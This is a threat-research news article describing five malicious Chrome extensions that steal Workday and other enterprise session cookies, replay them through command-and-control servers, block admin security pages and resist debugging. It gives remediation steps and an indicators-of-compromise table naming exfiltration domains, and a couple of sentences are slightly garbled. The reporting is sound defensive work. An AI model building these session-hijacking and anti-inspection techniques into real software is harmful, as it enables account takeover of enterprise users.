Five Malicious Chrome Extensions Target Enterprise HR and ERP Platforms for Full Account Takeover

Threat Research Team has identified a coordinated malware campaign involving five malicious Chrome extensions targeting enterprise HR and ERP platforms, including Workday, NetSuite, and SAP SuccessFactors.

The extensions have collectively reached over 2,300 users and employ complementary attack mechanisms to steal authentication tokens, block incident response capabilities, and enable complete account takeover through session hijacking.

Coordinated Malware Portfolio

Four extensions operate under the publisher name databycloud1104, while the fifth uses different branding (softwareaccess) but shares identical infrastructure patterns.

The extensions masquerade as productivity tools promising streamlined access to enterprise platforms and multi-account management.

All five request standard permissions that appear legitimate during installation, with privacy policies falsely claiming no data collection despite implementing comprehensive credential theft mechanisms.

The extensions demonstrate sophisticated development with version progression showing active maintenance.

Data By Cloud 2 (v3.3) has the most extensive distribution, with 1,000 users, and blocks 56 administrative pages, 27% more than Tool Access 11 (v1.4).

Data By Cloud 1 (v3.2) adds anti-debugging capabilities, while Software Access (v1.4) implements bidirectional cookie manipulation for direct session hijacking.

The campaign deploys three distinct attack types working in concert. Cookie exfiltration extensions extract session authentication tokens and transmit them to remote servers every 60 seconds via encrypted command-and-control channels.

The extensions implement persistent monitoring via cookie change listeners and alarms that verify the login state, ensuring that threat actors maintain current credentials even as users reauthenticate during everyday workflows.

DOM manipulation extensions block access to administrative interfaces by erasing page content and redirecting to malformed URLs.

Tool Access 11 targets 44 pages, including authentication management, security policy configuration, and session controls.

Data By Cloud 2 expands this to 56 pages by adding password changes, account deactivation, 2FA device management, and security audit log access.

The extensions use MutationObservers to monitor page content every 50 milliseconds, ensuring continuous blocking even in single-page applications.

Software Access implements the most sophisticated attack through bidirectional cookie manipulation.

The extension both exfiltrates authentication tokens and receives stolen cookies from its command-and-control server, then injects them into the browser using chrome.cookies.set() to enable direct session hijacking.

This eliminates authentication requirements, allowing threat actors to access compromised accounts without passwords while bypassing multi-factor authentication.

The extensions include identical lists of 23 security-focused Chrome extensions they monitor for presence, including EditThisCookie, Cookie-Editor, ModHeader, Redux DevTools, and SessionBox.

The chrome. The management API enumerates installed extensions and reports findings to command-and-control servers, allowing threat actors to assess whether security tools might interfere with credential theft.

Data By Cloud 1 and Software Access incorporate the DisableDevtool library to prevent code inspection through browser developer tools.

The library detects modifications to RegExp. prototype. toString (), property inspection, window size comparisons, and performance timing analysis to identify debugging attempts.

Software Access adds password field protection that prevents users from changing input types to inspect credential values, reverting any such attempts within one second.

The coordinated deployment creates a persistent account compromise that survives standard incident response procedures.

Security teams can detect unauthorized access through SIEM alerts or authentication anomalies, but every standard remediation action is blocked.

Organizations face containment failure scenarios where administrators cannot rotate credentials, deactivate accounts, remove trusted devices, or modify security policies because the extensions intercept and block these functions.

The campaign targets Workday’s sandbox environment (workdaysuv.com) explicitly, which is used for testing security configuration changes before production deployment.

By blocking security pages in the sandbox, the extensions prevent validation of password policy changes, authentication updates, or other security improvements, forcing organizations to either deploy untested changes directly to production or abandon security improvements entirely.

Users should immediately remove matching extensions, review authentication history for unexpected access, and perform password resets from clean systems.

Chrome sync settings must be turned off on all devices before removal to prevent reinstallation.

Security teams should implement Chrome Enterprise extension allowlists to prevent unauthorized installations and block identified command-and-control domains via web proxy or DNS filtering.

Authentication logs require auditing for simultaneous sessions from multiple IPs or geographically inconsistent access patterns.

Security teams from Socket are validated policy deployment status across endpoints, as restrictions on browser extensions can interfere with administrative configuration workflows, as outlined in browser security policy management documentation.

Indicators of Compromise

Indicator Type	Value	Notes
Publisher Name	databycloud1104	Registered for four extensions
Publisher Email	admin@databycloud.com	Associated with databycloud1104
Publisher Name	softwareaccess	Registered for one extension
Publisher Email	softwareaccess0908@gmail.com	Associated with softwareaccess
Extension ID	oldhjammhkghhahhhdcifmmlefibciph	DataByCloud Access v1.6
Extension ID	ijapakghdgckgblfgjobhcfglebbkebf	Tool Access 11 v1.4
Extension ID	makdmacamkifdldldlelollkkjnoiedg	Data By Cloud 2 v3.3
Extension ID	mbjjeombjeklkbndcjgmfcdhfbjngcam	Data By Cloud 1 v3.2
Extension ID	bmodapcihjhklpogdpblefpepjolaoij	Software Access v1.4
C2 Domain	api.databycloud.com	Cookie exfiltration endpoint
C2 Path	/api/v1/mv3	MV3 manifest version indicator
C2 Domain	api.software-access.com	Bidirectional C2 infrastructure
WebSocket	wss://api.software-access.com	Real-time communication
Target Cookie	__session	Authentication token name
Blocked Domain	workdaysuv.com	Workday sandbox environment

The campaign maps to MITRE ATT&CK techniques T1539 (Steal Web Session Cookie), T1185 (Browser Session Hijacking), T1176.001 (Browser Extensions), T1027 (Obfuscated Files or Information), and T1562.001 (Disable or Modify Tools).

Technique ID	Technique Name
T1539	Steal Web Session Cookie
T1185	Browser Session Hijacking
T1176.001	Browser Extensions
T1027	Obfuscated Files or Information
T1562.001	Disable or Modify Tools

All five extensions remain under investigation with takedown requests submitted to Google’s Chrome Web Store security team.

Similar patterns targeting other enterprise platforms should be anticipated as the threat actor maintains disposable infrastructure and complementary capabilities across multiple publisher identities.

Follow us on Google News , LinkedIn and X to Get More Instant Updates. Set Cyberpress as a Preferred Source in Google.

The post Five Malicious Chrome Extensions Target Enterprise HR and ERP Platforms for Full Account Takeover appeared first on Cyber Security News.